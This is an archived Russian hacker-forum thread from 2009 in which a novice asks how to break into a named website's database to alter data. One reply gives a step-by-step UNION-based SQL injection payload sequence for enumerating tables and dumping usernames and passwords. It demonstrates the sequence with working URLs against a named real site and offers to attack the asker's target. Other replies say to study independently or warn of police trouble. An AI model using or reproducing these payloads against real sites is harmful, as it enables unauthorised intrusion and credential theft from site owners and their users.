Добро пожаловать! Это — архивная версия форумов на «Хакер.Ru». Она работает в режиме read-only.
 

Получить доступ к БД

Пользователи, просматривающие топик: none

Зашли как: Guest
Все форумы >> [В Сети] >> Получить доступ к БД
Имя
Сообщение << Старые топики   Новые топики >>
Получить доступ к БД - 2009-07-02 00:22:53.073333   
TESTinder

Сообщений: 4
Оценки: 0
Присоединился: 2009-07-02 00:09:32.583333
Всем привет! Такая проблема у меня, необходимо получить доступ к базе данных одного сайта, чтобы возможно было изменить кое-какие данные :)
С чего начать, что делать? Я в хакерстве полный 0, поэтому прошу объяснять как можно понятней
Post #: 1
RE: Получить доступ к БД - 2009-07-02 04:19:47.496666   
faza09

Сообщений: 259
Оценки: 0
Присоединился: 2009-05-18 22:19:25.963333
Ты там обнаружил инъект?
если да, то пиши:
id=-1+order+by+1–
id=-1+order+by+5–
добавляй так,пока не получишь ошибку - последнее число без ошибки будет кол-вом полей
id=-1+order+by+10– //ошибка есть,значит берём поменьше
id=-1+order+by+5– //ошбки нет,значит будем искать в промежутке 5<=x<10
id=-1+order+by+7– //ошибка есть
id=-1+order+by+6– //ошибки нет значит 6 и есть волшебное число:)
id=-1+union+select+1,2,3,4,5,6/* //(если версия SQL>=4,если ниже,то он выдаст ошибку)
дальше смотрим:какие из этих чисел появились на странице и берём любое из них(пусть будет 2)
id=-1+union+select+1,version(),3,4,5,6/* //на странице появиться версия БД,если версия БД выше 5 то получить инфу о табличках не трудно:),а если нет,то перебором:(
id=-1+union+select+1,group_concat(table_name),3,4,5,6+from+information_schema.tables/* //тут ты получишь список всех таблиц
дальше ищем интересующие имена таблиц типа users,members,admin и т.д.,короче - те в которых могут находиться логины и пассы(у нас будет users)
id=-1+union+select+1,group_concat(user()),3,4,5,6+from+users/* //тут мы совершенно точно получим имена всех юзеров
id=-1+union+select+1,group_concat(user(),char(58),password),3,4,5,6+from+users/* // а вот пароль может называться по-разному(pwd,pass,passwd etc.)
char(58) мы вставили чтоб юзер и его пароль разделялись символом :
если тебе известен пароль и имя админа - смело ищи вход в админку и логенься!
Пример:
http://www.domkino.spb.ru/description.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12–
http://www.domkino.spb.ru/description.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,version(),11,12–
http://www.domkino.spb.ru/description.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,group_concat(table_name),11,12+from+information_schema.tables–
http://www.domkino.spb.ru/description.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,group_concat(user()),11,12+from+user– //4 юзера через запятую…
http://www.domkino.spb.ru/description.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,group_concat(user(),char(58),password),11,12+from+user– //юзер:пароль,юзер:пароль…
единственное,это то,что я тут админку не нашёл и пароли вводить некуда:(,может кто-нить и найдёт…:)
а лучше ссылочку скинь в студию,посмотрим,что можно сделать..!
Post #: 2
RE: Получить доступ к БД - 2009-07-02 11:56:53.933333   
TESTinder

Сообщений: 4
Оценки: 0
Присоединился: 2009-07-02 00:09:32.583333
quote:

Ты там обнаружил инъект?

:( яж говорю что полный 0, поэтому не очень понимаю о чем речь
 
сайт _http://84rur.ru/, но мне не надо взламывать пароль и логин админа, необходимо получить доступ к БД, чтобы было возможно получить список всех таблиц и возможность их изменить, т.е. узнать пасс и логин к БД
Post #: 3
RE: Получить доступ к БД - 2009-07-02 13:02:56.440000   
oRb

Сообщений: 4044
Оценки: 597
Присоединился: 2007-03-28 18:45:06.630000
TESTinder, ищи уязвимости, а не пости на форуме.
Post #: 4
RE: Получить доступ к БД - 2009-07-02 13:29:43.290000   
shad0vv

Сообщений: 165
Оценки: 0
Присоединился: 2008-07-15 19:53:01.200000
идешь в гугль и читаешь статьи про:
1. XSS (пассивные и активные)
2. SQL injections
3. php injections

Если ты надеешся что все сразу пойдут ломать твой сайт - убейсь об стену
Post #: 5
RE: Получить доступ к БД - 2009-07-02 13:39:28.590000   
pphotoshoper

Сообщений: 51
Оценки: 0
Присоединился: 2009-06-22 18:48:20.460000
не лезь.. - запалишися потом дядьки приедут и пк заберут . ( и в обязьянник посадят )
если не умеешь лучше и не лезь ! [&:][&:][&:]
Post #: 6
RE: Получить доступ к БД - 2009-07-02 14:02:08.556666   
TESTinder

Сообщений: 4
Оценки: 0
Присоединился: 2009-07-02 00:09:32.583333
quote:

Если ты надеешся что все сразу пойдут ломать твой сайт - убейсь об стену

да не надеюсь я что все пойдут ломать этот сайт :D
просто хочу научиться, спасиб за инфу, пойду читать :)
Post #: 7
Страниц:  [1]
Все форумы >> [В Сети] >> Получить доступ к БД







Связаться:
Вопросы по сайту / xakep@glc.ru

Предупреждение: использование полученных знаний в противозаконных целях преследуется по закону.